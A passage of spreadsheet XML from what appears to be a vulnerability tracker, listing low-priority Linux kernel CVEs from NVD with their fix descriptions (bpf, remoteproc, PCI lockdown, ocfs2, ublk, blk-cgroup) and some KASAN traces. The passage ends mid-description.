      <c r="L681" s="5" t="inlineStr"/>
      <c r="M681" s="5" t="inlineStr"/>
      <c r="N681" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O681" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P681" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q681" s="5" t="inlineStr"/>
      <c r="R681" s="5" t="inlineStr"/>
      <c r="S681" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf, cgroup: Fix invalid storage access after __cgroup_bpf_attach failed
A potential invalid storage access issue can occur after replacing a
cgroup bpf prog.
This occurs in the following scenario:
1. prog1 with storage is attached to a cgroup in multi-attach mode.
2. prog1 is replaced with prog2 using BPF_F_REPLACE in multi-attach
   mode, but fails midway (e.g. in bpf_trampoline_link_cgroup_shim or
   update_effective_progs).
3. A new prog3 is attached to the cgroup in multi-attach mode.
The reason is that __cgroup_bpf_attach overwrites pl-&gt;storage with the
new storage prior to attachment completion. When attachment fails
midway, the cleanup path calls bpf_cgroup_storages_free(new_storage) to
free the newly allocated storage, but fails to restore pl-&gt;storage back
to old_storage.
Consequently, the still-active prog1 holds invalid or dangling storage
pointers, leading to an invalid memory access when prog1 executes and
calls bpf_get_local_storage. Additionally, original pl-&gt;flags and
cgrp-&gt;bpf.flags[atype] are left unrestored.
Fix this by saving old_pl_flags, old_storage, and old_flags prior to the
update, and properly restoring all of them in the cleanup path on error.</t>
        </is>
      </c>
      <c r="T681" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90313</t>
        </is>
      </c>
    </row>
    <row r="682">
      <c r="A682" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B682" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C682" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90314</t>
        </is>
      </c>
      <c r="D682" s="5" t="inlineStr"/>
      <c r="E682" s="5" t="inlineStr"/>
      <c r="F682" s="5" t="inlineStr"/>
      <c r="G682" s="5" t="inlineStr"/>
      <c r="H682" s="5" t="inlineStr"/>
      <c r="I682" s="5" t="inlineStr"/>
      <c r="J682" s="5" t="inlineStr"/>
      <c r="K682" s="5" t="inlineStr"/>
      <c r="L682" s="5" t="inlineStr"/>
      <c r="M682" s="5" t="inlineStr"/>
      <c r="N682" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O682" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P682" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q682" s="5" t="inlineStr"/>
      <c r="R682" s="5" t="inlineStr"/>
      <c r="S682" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
remoteproc: fix OOB read via signed offset in rsc_table_for_each_entry()
table-&gt;offset[i] is a u32 from firmware, but was stored into a signed
int.  A crafted offset like 0xFFFFFFF0 becomes -16, placing hdr 16 bytes
before the table buffer.  The subsequent avail check was bypassed
because the negative int was promoted to a large size_t in the
expression "table_sz - offset - sizeof(*hdr)", yielding a large positive
avail and letting the out-of-bounds hdr-&gt;type read proceed undetected.
Store the offset as u32 and validate it with unsigned comparisons before
any pointer arithmetic.</t>
        </is>
      </c>
      <c r="T682" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90314</t>
        </is>
      </c>
    </row>
    <row r="683">
      <c r="A683" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B683" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C683" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90315</t>
        </is>
      </c>
      <c r="D683" s="5" t="inlineStr"/>
      <c r="E683" s="5" t="inlineStr"/>
      <c r="F683" s="5" t="inlineStr"/>
      <c r="G683" s="5" t="inlineStr"/>
      <c r="H683" s="5" t="inlineStr"/>
      <c r="I683" s="5" t="inlineStr"/>
      <c r="J683" s="5" t="inlineStr"/>
      <c r="K683" s="5" t="inlineStr"/>
      <c r="L683" s="5" t="inlineStr"/>
      <c r="M683" s="5" t="inlineStr"/>
      <c r="N683" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O683" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P683" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q683" s="5" t="inlineStr"/>
      <c r="R683" s="5" t="inlineStr"/>
      <c r="S683" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
PCI/sysfs: Add lockdown checks to legacy I/O and memory handlers
Currently, the legacy I/O and memory sysfs handlers do not check
security_locked_down(LOCKDOWN_PCI_ACCESS), leaving the legacy_io and
legacy_mem files unprotected when the kernel is locked down.
Commit eb627e17727e ("PCI: Lock down BAR access when the kernel is locked
down") added the check to pci_write_config(), pci_mmap_resource(), and
pci_write_resource_io() to prevent userspace from programming DMA-capable
hardware that could be used to modify kernel code, but did not cover the
legacy handlers.
As a result, root can still write arbitrary I/O ports and map the legacy
I/O and memory spaces while the kernel is locked down, which is the same
capability the lockdown is meant to remove.
Add the same check to pci_write_legacy_io(), pci_mmap_legacy_mem(), and
pci_mmap_legacy_io().
These generic handlers cover both architectures that define HAVE_PCI_LEGACY
(such as Alpha and PowerPC).
[bhelgaas: add Link]</t>
        </is>
      </c>
      <c r="T683" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90315</t>
        </is>
      </c>
    </row>
    <row r="684">
      <c r="A684" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B684" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C684" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90316</t>
        </is>
      </c>
      <c r="D684" s="5" t="inlineStr"/>
      <c r="E684" s="5" t="inlineStr"/>
      <c r="F684" s="5" t="inlineStr"/>
      <c r="G684" s="5" t="inlineStr"/>
      <c r="H684" s="5" t="inlineStr"/>
      <c r="I684" s="5" t="inlineStr"/>
      <c r="J684" s="5" t="inlineStr"/>
      <c r="K684" s="5" t="inlineStr"/>
      <c r="L684" s="5" t="inlineStr"/>
      <c r="M684" s="5" t="inlineStr"/>
      <c r="N684" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O684" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P684" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q684" s="5" t="inlineStr"/>
      <c r="R684" s="5" t="inlineStr"/>
      <c r="S684" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/omap: dsi: Do not copy isr table
To be able to unregister stuff from isrs, the corresponding table was
copied.  Nobody seems to unregister stuff that way, so it does not help.
But there are stack-allocated objects passed to these isrs giving chances
of UAF of these objects if irqs are unregistered while they are handled,
so better do not copy that table.</t>
        </is>
      </c>
      <c r="T684" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90316</t>
        </is>
      </c>
    </row>
    <row r="685">
      <c r="A685" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B685" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C685" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90317</t>
        </is>
      </c>
      <c r="D685" s="5" t="inlineStr"/>
      <c r="E685" s="5" t="inlineStr"/>
      <c r="F685" s="5" t="inlineStr"/>
      <c r="G685" s="5" t="inlineStr"/>
      <c r="H685" s="5" t="inlineStr"/>
      <c r="I685" s="5" t="inlineStr"/>
      <c r="J685" s="5" t="inlineStr"/>
      <c r="K685" s="5" t="inlineStr"/>
      <c r="L685" s="5" t="inlineStr"/>
      <c r="M685" s="5" t="inlineStr"/>
      <c r="N685" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O685" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P685" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q685" s="5" t="inlineStr"/>
      <c r="R685" s="5" t="inlineStr"/>
      <c r="S685" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Invalidate RCU pointers after final spin unlock
In a sleepable BPF program, a spin lock can provide the only RCU protection
for a kptr. The final bpf_spin_unlock() ends that protection, but the
verifier leaves the pointer valid. Another CPU can then free the object
before the pointer is used. A capability-limited runtime PoC triggered a
task_struct use-after-free in __bpf_get_task_stack().
Record whether the program is in an RCU-protected context before releasing
the lock. Invalidate RCU-protected pointers only when the unlock leaves the
final such context. This preserves valid pointers in non-sleepable programs
and inside an explicit RCU read-side section.</t>
        </is>
      </c>
      <c r="T685" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90317</t>
        </is>
      </c>
    </row>
    <row r="686">
      <c r="A686" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B686" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C686" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90318</t>
        </is>
      </c>
      <c r="D686" s="5" t="inlineStr"/>
      <c r="E686" s="5" t="inlineStr"/>
      <c r="F686" s="5" t="inlineStr"/>
      <c r="G686" s="5" t="inlineStr"/>
      <c r="H686" s="5" t="inlineStr"/>
      <c r="I686" s="5" t="inlineStr"/>
      <c r="J686" s="5" t="inlineStr"/>
      <c r="K686" s="5" t="inlineStr"/>
      <c r="L686" s="5" t="inlineStr"/>
      <c r="M686" s="5" t="inlineStr"/>
      <c r="N686" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O686" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P686" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q686" s="5" t="inlineStr"/>
      <c r="R686" s="5" t="inlineStr"/>
      <c r="S686" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fat: release buffer head after rebuilding parent
fat_scan_logstart() leaves the matching directory entry's buffer head in
sinfo.bh for the caller to release, just like fat_scan().
fat_rebuild_parent() uses the directory entry to rebuild the parent inode
for the nostale_ro NFS export path, but does not release sinfo.bh after a
successful scan.  Release it once fat_build_inode() has consumed the
directory entry data.</t>
        </is>
      </c>
      <c r="T686" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90318</t>
        </is>
      </c>
    </row>
    <row r="687">
      <c r="A687" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B687" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C687" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90319</t>
        </is>
      </c>
      <c r="D687" s="5" t="inlineStr"/>
      <c r="E687" s="5" t="inlineStr"/>
      <c r="F687" s="5" t="inlineStr"/>
      <c r="G687" s="5" t="inlineStr"/>
      <c r="H687" s="5" t="inlineStr"/>
      <c r="I687" s="5" t="inlineStr"/>
      <c r="J687" s="5" t="inlineStr"/>
      <c r="K687" s="5" t="inlineStr"/>
      <c r="L687" s="5" t="inlineStr"/>
      <c r="M687" s="5" t="inlineStr"/>
      <c r="N687" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O687" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P687" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q687" s="5" t="inlineStr"/>
      <c r="R687" s="5" t="inlineStr"/>
      <c r="S687" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
rapidio: clear mport-&gt;net when rio_add_net() fails
rio_alloc_net() stores the newly allocated rio_net in mport-&gt;net before
rio_scan_alloc_net() registers the device.
If rio_add_net() fails, rio_scan_alloc_net() drops the device reference
with put_device(), which releases the rio_net through the device release
callback.  However, mport-&gt;net is left pointing at the freed object.
A later mport unregister path can then dereference the dangling mport-&gt;net
pointer and may try to free the same rio_net again.
Clear mport-&gt;net in the rio_add_net() failure path, matching the cleanup
done for the destID table allocation failure path.</t>
        </is>
      </c>
      <c r="T687" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90319</t>
        </is>
      </c>
    </row>
    <row r="688">
      <c r="A688" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B688" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C688" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90320</t>
        </is>
      </c>
      <c r="D688" s="5" t="inlineStr"/>
      <c r="E688" s="5" t="inlineStr"/>
      <c r="F688" s="5" t="inlineStr"/>
      <c r="G688" s="5" t="inlineStr"/>
      <c r="H688" s="5" t="inlineStr"/>
      <c r="I688" s="5" t="inlineStr"/>
      <c r="J688" s="5" t="inlineStr"/>
      <c r="K688" s="5" t="inlineStr"/>
      <c r="L688" s="5" t="inlineStr"/>
      <c r="M688" s="5" t="inlineStr"/>
      <c r="N688" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O688" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P688" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q688" s="5" t="inlineStr"/>
      <c r="R688" s="5" t="inlineStr"/>
      <c r="S688" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ocfs2: validate external xattr entries when reading metadata
ocfs2_validate_xattr_block() checks the xattr block header before the
block reaches higher-level xattr users, but it does not verify that a
non-indexed block's xh_count and entry offsets fit inside the block. 
Indexed buckets likewise reach list/get consumers after ECC without an
entry-bounds check.
Use the flat xattr entry validator for non-indexed external xattr blocks,
and use a bucket-specific validator for indexed buckets at metadata read
time.  The bucket validator keeps the entry array bounded by the first
bucket block while checking name/value offsets against the bucket block
they target.
Reject corrupted external xattr metadata before listxattr() or getxattr()
can walk out-of-range entry arrays or name/value offsets.
Validation reproduced this kernel report:
BUG: KASAN: use-after-free in ocfs2_xattr_list_entries+0xd7/0x190
Read of size 1 at addr ffff88810a654007 by task ocfs2_xattr_lis/630
Call Trace:
  dump_stack_lvl+0x66/0xa0
  print_report+0xce/0x630
  kasan_report+0xe0/0x110
  ocfs2_xattr_list_entries+0xd7/0x190
  ocfs2_listxattr+0x3f6/0x610
  listxattr+0x90/0xe0
  path_listxattrat+0xed/0x220
  do_syscall_64+0x115/0x6a0
  entry_SYSCALL_64_after_hwframe+0x77/0x7f</t>
        </is>
      </c>
      <c r="T688" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90320</t>
        </is>
      </c>
    </row>
    <row r="689">
      <c r="A689" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B689" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C689" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90321</t>
        </is>
      </c>
      <c r="D689" s="5" t="inlineStr"/>
      <c r="E689" s="5" t="inlineStr"/>
      <c r="F689" s="5" t="inlineStr"/>
      <c r="G689" s="5" t="inlineStr"/>
      <c r="H689" s="5" t="inlineStr"/>
      <c r="I689" s="5" t="inlineStr"/>
      <c r="J689" s="5" t="inlineStr"/>
      <c r="K689" s="5" t="inlineStr"/>
      <c r="L689" s="5" t="inlineStr"/>
      <c r="M689" s="5" t="inlineStr"/>
      <c r="N689" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O689" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P689" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q689" s="5" t="inlineStr"/>
      <c r="R689" s="5" t="inlineStr"/>
      <c r="S689" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ocfs2: validate inline xattrs during inode block validation
Patch series "ocfs2: validate xattr entry bounds", v7.
This series validates OCFS2 xattr entry name/value bounds when xattr
metadata is read and validated, before getxattr() or listxattr() can walk
out-of-range entry arrays or offsets from corrupted metadata.
This patch (of 2):
ocfs2_validate_inode_block() verifies a dinode before OCFS2 users walk
metadata from it, but inline xattr metadata is still checked only in
operation-specific consumers.  The existing ibody lookup helper validates
inline header placement and entry count, but inode block validation does
not reject entry name/value bounds.
Add a flat xattr entry validator and call it from inode block validation
for inline xattrs.  Keep the operation paths on their existing
header/count lookup checks; the full entry bounds check now runs when the
inode block is validated at read time.
Reject corrupted inline xattr metadata before ocfs2_xattr_ibody_get() or
listxattr() can walk past the inline storage.
Validation reproduced this kernel report:
BUG: KASAN: use-after-free in ocfs2_xattr_find_entry+0x5a/0x170
Read of size 2 at addr ffff8881242a2000 by task python3/529
Call Trace:
  dump_stack_lvl+0x66/0xa0
  print_report+0xce/0x630
  kasan_report+0xe0/0x110
  ocfs2_xattr_find_entry+0x5a/0x170
  ocfs2_xattr_get_nolock+0x20a/0x820
  ocfs2_xattr_get+0x10c/0x1e0
  __vfs_getxattr+0xe2/0x130
  vfs_getxattr+0x185/0x1b0</t>
        </is>
      </c>
      <c r="T689" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90321</t>
        </is>
      </c>
    </row>
    <row r="690">
      <c r="A690" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B690" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C690" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90322</t>
        </is>
      </c>
      <c r="D690" s="5" t="inlineStr"/>
      <c r="E690" s="5" t="inlineStr"/>
      <c r="F690" s="5" t="inlineStr"/>
      <c r="G690" s="5" t="inlineStr"/>
      <c r="H690" s="5" t="inlineStr"/>
      <c r="I690" s="5" t="inlineStr"/>
      <c r="J690" s="5" t="inlineStr"/>
      <c r="K690" s="5" t="inlineStr"/>
      <c r="L690" s="5" t="inlineStr"/>
      <c r="M690" s="5" t="inlineStr"/>
      <c r="N690" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O690" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P690" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q690" s="5" t="inlineStr"/>
      <c r="R690" s="5" t="inlineStr"/>
      <c r="S690" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ocfs2/cluster: keep heartbeat local node stable
o2nm_node_local_store() handles local=0 by stopping o2net and setting
cl_local_node to O2NM_INVALID_NODE_NUM, but it leaves cl_has_local set. 
That stale state makes o2nm_this_node() return 255, blocks a later local=1
attempt with -EBUSY, and can feed 255 to heartbeat users that call
o2nm_this_node() dynamically.
Clearing cl_has_local is required when the local node is reset.  But
heartbeat threads can still be running at that point.  They pin the local
node config item at startup, yet o2hb_do_disk_heartbeat() and thread
teardown re-read o2nm_this_node() for the local slot and for
o2nm_undepend_this_node().  Once local=0 has cleared the live local-node
state, those dynamic reads return O2NM_MAX_NODES, which is also the
invalid node number 255.
Store the local node number in the heartbeat region when the region
starts.  Use that stable node for heartbeat slot writes/checks,
negotiation messages, and the final configfs undepend.  Stop the heartbeat
loop when the current local node no longer matches the stored node, and
clear cl_has_local together with cl_local_node in the local=0 path so
nodemanager state matches node removal.
Validation reproduced this kernel report:
KASAN slab-out-of-bounds in o2hb_do_disk_heartbeat+0x372/0xb30
RIP: 0010:memset+0xf/0x20
Read of size 8
Call trace:
  dump_stack_lvl+0x66/0xa0
  print_report+0xd0/0x630
  o2hb_do_disk_heartbeat+0x372/0xb30 (fs/ocfs2/cluster/heartbeat.c:1079)
  srso_alias_return_thunk+0x5/0xfbef5
  __virt_addr_valid+0x188/0x2f0
  kasan_report+0xe4/0x120
  o2hb_do_disk_heartbeat+0x5/0xb30 (fs/ocfs2/cluster/heartbeat.c:1079)
  o2hb_thread+0x14e/0x770
  kthread_affine_node+0x139/0x180
  lockdep_hardirqs_on_prepare+0xda/0x190
  trace_hardirqs_on+0x18/0x130
  kthread+0x19d/0x1e0
  ret_from_fork+0x37a/0x4d0
  __switch_to+0x2d5/0x6f0
  ret_from_fork_asm+0x1a/0x30</t>
        </is>
      </c>
      <c r="T690" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90322</t>
        </is>
      </c>
    </row>
    <row r="691">
      <c r="A691" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B691" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C691" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90323</t>
        </is>
      </c>
      <c r="D691" s="5" t="inlineStr"/>
      <c r="E691" s="5" t="inlineStr"/>
      <c r="F691" s="5" t="inlineStr"/>
      <c r="G691" s="5" t="inlineStr"/>
      <c r="H691" s="5" t="inlineStr"/>
      <c r="I691" s="5" t="inlineStr"/>
      <c r="J691" s="5" t="inlineStr"/>
      <c r="K691" s="5" t="inlineStr"/>
      <c r="L691" s="5" t="inlineStr"/>
      <c r="M691" s="5" t="inlineStr"/>
      <c r="N691" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O691" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P691" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q691" s="5" t="inlineStr"/>
      <c r="R691" s="5" t="inlineStr"/>
      <c r="S691" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ublk: validate auto buf reg before taking uring_cmd
With UBLK_F_AUTO_BUF_REG, invalid sqe-&gt;addr can fail after
ublk_fill_io_cmd() has set UBLK_IO_FLAG_ACTIVE. The uring_cmd is
completed while the tag stays active, which can hang teardown.
Split validation from buffer apply so the check has no side effects,
then take the uring_cmd and store the already-validated buffer. Apply
the same order in FETCH so io-&gt;buf is not written before __ublk_fetch()
state checks.</t>
        </is>
      </c>
      <c r="T691" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90323</t>
        </is>
      </c>
    </row>
    <row r="692">
      <c r="A692" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B692" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C692" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90324</t>
        </is>
      </c>
      <c r="D692" s="5" t="inlineStr"/>
      <c r="E692" s="5" t="inlineStr"/>
      <c r="F692" s="5" t="inlineStr"/>
      <c r="G692" s="5" t="inlineStr"/>
      <c r="H692" s="5" t="inlineStr"/>
      <c r="I692" s="5" t="inlineStr"/>
      <c r="J692" s="5" t="inlineStr"/>
      <c r="K692" s="5" t="inlineStr"/>
      <c r="L692" s="5" t="inlineStr"/>
      <c r="M692" s="5" t="inlineStr"/>
      <c r="N692" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O692" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P692" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q692" s="5" t="inlineStr"/>
      <c r="R692" s="5" t="inlineStr"/>
      <c r="S692" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ublk: check import_ubuf() return value
import_ubuf() can fail if the address range (provided by the userspace
ublk server) is outside the allowed user address space. Return that 0
bytes were copied if import_ubuf() fails rather than passing an
uninitialized struct iov_iter to ublk_copy_user_pages().</t>
        </is>
      </c>
      <c r="T692" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90324</t>
        </is>
      </c>
    </row>
    <row r="693">
      <c r="A693" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B693" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C693" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90325</t>
        </is>
      </c>
      <c r="D693" s="5" t="inlineStr"/>
      <c r="E693" s="5" t="inlineStr"/>
      <c r="F693" s="5" t="inlineStr"/>
      <c r="G693" s="5" t="inlineStr"/>
      <c r="H693" s="5" t="inlineStr"/>
      <c r="I693" s="5" t="inlineStr"/>
      <c r="J693" s="5" t="inlineStr"/>
      <c r="K693" s="5" t="inlineStr"/>
      <c r="L693" s="5" t="inlineStr"/>
      <c r="M693" s="5" t="inlineStr"/>
      <c r="N693" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O693" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P693" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q693" s="5" t="inlineStr"/>
      <c r="R693" s="5" t="inlineStr"/>
      <c r="S693" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
blk-cgroup: skip dying blkg in blkcg_activate_policy()
When switching IO schedulers on a block device, blkcg_activate_policy()
can race with concurrent blkcg deletion, leading to a use-after-free in
rcu_accelerate_cbs.
T1:                               T2:
                                  blkg_destroy
                                  kill(&amp;blkg-&gt;refcnt) // blkg-&gt;refcnt=1-&gt;0
                                  blkg_release // call_rcu(__blkg_release)
                                  ...
                                  blkg_free_workfn
                                  -&gt;pd_free_fn(pd)
elv_iosched_store
elevator_switch
...
iterate blkg list
blkg_get(blkg) // blkg-&gt;refcnt=0-&gt;1
                                  list_del_init(&amp;blkg-&gt;q_node)
blkg_put(pinned_blkg) // blkg-&gt;refcnt=1-&gt;0
blkg_release // call_rcu again
rcu_accelerate_cbs // uaf
Fix this by checking hlist_unhashed(&amp;blkg-&gt;blkcg_node) before getting
a reference to the blkg. This is the same check used in blkg_destroy()
to detect if a blkg has already been destroyed. If the blkg is already
unhashed, skip processing it since it's being destroyed.</t>
        </is>
      </c>
      <c r="T693" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90325</t>
        </is>
      </c>
    </row>
    <row r="694">
      <c r="A694" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B694" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C694" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90326</t>
        </is>
      </c>
      <c r="D694" s="5" t="inlineStr"/>
      <c r="E694" s="5" t="inlineStr"/>
      <c r="F694" s="5" t="inlineStr"/>
      <c r="G694" s="5" t="inlineStr"/>
      <c r="H694" s="5" t="inlineStr"/>
      <c r="I694" s="5" t="inlineStr"/>
      <c r="J694" s="5" t="inlineStr"/>
      <c r="K694" s="5" t="inlineStr"/>
      <c r="L694" s="5" t="inlineStr"/>
      <c r="M694" s="5" t="inlineStr"/>
      <c r="N694" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O694" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P694" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q694" s="5" t="inlineStr"/>
      <c r="R694" s="5" t="inlineStr"/>
      <c r="S694" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
blk-cgroup: fix race between policy activation and blkg destruction
When switching an IO scheduler on a block device, blkcg_activate_policy()
allocates blkg_policy_data (pd) for all blkgs attached to the queue.
However, blkcg_activate_policy() may race with concurrent blkcg deletion,
leading to use-after-free and memory leak issues.
The use-after-free occurs in the following race:
T1 (blkcg_activate_policy):
  - Successfully allocates pd for blkg1 (loop0-&gt;queue, blkcgA)
  - Fails to allocate pd for blkg2 (loop0-&gt;queue, blkcgB)
  - Enters the enomem rollback path to release blkg1 resources
T2 (blkcg deletion):
  - blkcgA is deleted concurrently
  - blkg1 is freed via blkg_free_workfn()
  - blkg1-&gt;pd is freed
T1 (continued):
  - Rollback path accesses blkg1-&gt;pd-&gt;online after pd is freed
  - Triggers use-after-free
In addition, blkg_free_workfn() frees pd before removing the blkg from
q-&gt;blkg_list. This allows blkcg_activate_policy() to allocate a new pd
for a blkg that is being destroyed, leaving the newly allocated pd
unreachable when the blkg is finally freed.
Fix these races by extending blkcg_mutex coverage to serialize
